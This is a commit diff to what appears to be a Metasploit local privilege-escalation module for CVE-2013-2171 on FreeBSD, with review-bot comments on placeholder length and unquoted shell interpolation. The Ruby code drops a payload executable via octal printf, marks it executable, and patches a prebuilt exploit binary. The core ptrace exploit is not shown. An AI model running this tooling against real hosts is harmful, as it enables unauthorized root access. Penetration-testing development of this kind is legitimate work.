Land #2023 - Improve CVE-2013-2171
commit
97ab9fa8df
Binary file not shown.
|
@ -17,7 +17,7 @@ int main(int ac, char **av) {
|
|||
struct ptrace_io_desc piod;
|
||||
char *s, *d;
|
||||
int pid;
|
||||
char *bin = "/tmp/W00T"; // "W00T" is just a place holder
|
||||
char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"; // is just a place holder
|
||||
|
||||
if (geteuid() == 0) {
|
||||
setuid(0);
|
||||
|
|
|
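Review bot: The comment on the new `bin` line lost its subject and no longer says what the string is a placeholder for, or why it is exactly 40 characters long. The Ruby module changed in this same commit substitutes this literal inside the prebuilt binary with the payload path padded to 40 bytes with NULs, so the length is a contract between the two files and a later edit to either side would silently break it. I would write the comment as `// 40-byte slot, replaced in the prebuilt binary by the NUL-padded payload path; keep the length in sync with the module`. main's body continues outside the hunk.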
@ -12,6 +12,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -49,6 +50,11 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'DisclosureDate' => "Jun 18 2013",
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
# It isn't OptPath becuase it's a *remote* path
|
||||
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def write_file(data, fname)
|
||||
def write_file(fname, data)
|
||||
oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
|
||||
session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
|
||||
session.shell_command_token("chmod +x #{fname}")
|
||||
|
@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
return (chk =~ /ERROR: cannot open/) ? false : true
|
||||
end
|
||||
|
||||
|
||||
def upload_payload
|
||||
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
|
||||
fname = datastore['WritableDir']
|
||||
fname = "#{fname}/" unless fname =~ %r'/$'
|
||||
if fname.length > 36
|
||||
fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
|
||||
end
|
||||
fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
|
||||
|
||||
p = generate_payload_exe
|
||||
f = write_file(p, fname)
|
||||
f = write_file(fname, p)
|
||||
return nil if not f
|
||||
fname
|
||||
end
|
||||
|
@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
# Metasm does not support FreeBSD executable generation.
|
||||
#
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
|
||||
f = File.open(path, 'rb')
|
||||
x = f.read(f.stat.size)
|
||||
f.close
|
||||
|
||||
x.gsub(/W00T/, File.basename(payload_fname))
|
||||
x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
|
||||
x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
|
||||
end
|
||||
|
||||
def upload_exploit(payload_fname)
|
||||
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
|
||||
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
|
||||
bin = generate_exploit(payload_fname)
|
||||
f = write_file(bin, fname)
|
||||
f = write_file(fname, bin)
|
||||
return nil if not f
|
||||
fname
|
||||
end
|
||||
|
|
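Review bot: In `upload_payload` the guard and its message disagree: the code rejects a `WritableDir` longer than 36 characters once the trailing slash has been appended, while the message says 33. 36 is the figure that matches the 40-character placeholder minus the 4-character random name, so the message should read `"WritableDir can't be longer than 36 characters (including the trailing slash)"`, and both the 36 and the 40 in `ljust(40, "\x00")` would be safer derived from one constant holding the placeholder string. Separately, `fname` now comes from a datastore option and is interpolated unquoted into the `printf` and `chmod` command lines in `write_file`, so a directory containing spaces or shell metacharacters changes what the session runs; the value should be escaped (for example with `Shellwords.escape`) or restricted to a safe character set before use. The comment above the new option also has a typo, `becuase`.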